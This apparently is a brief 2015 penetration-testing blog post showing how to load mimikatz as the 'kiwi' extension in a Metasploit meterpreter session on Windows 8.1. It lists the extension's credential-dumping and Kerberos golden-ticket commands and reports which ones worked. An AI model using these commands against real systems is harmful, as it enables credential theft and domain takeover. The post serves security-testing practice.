Tuesday, February 10, 2015

MSF's + Mimikatz + Windows 8.1 part two


I love Twitter. OJ replied to me about my Metasploit+mimikatz+Windows 8.1 post.


Looks like mimikatz 2.0 IS in msf, it's just under the "use kiwi" functionality:

meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.0 alpha (x64/win64) release "Kiwi en C"
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.

meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials
    creds_kerberos         Retrieve Kerberos creds
    creds_livessp          Retrieve LiveSSP creds
    creds_msv              Retrieve LM/NTLM creds (hashes)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds
    creds_wdigest          Retrieve WDigest creds
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    lsa_dump               Dump LSA secrets
    wifi_list              List wifi profiles/creds

I wasn't able to get the hashes with any of the creds_* modules, but lsa_dump and Kerberos functionality seemed to be working like it should.

HTH for future pentests.

-CG

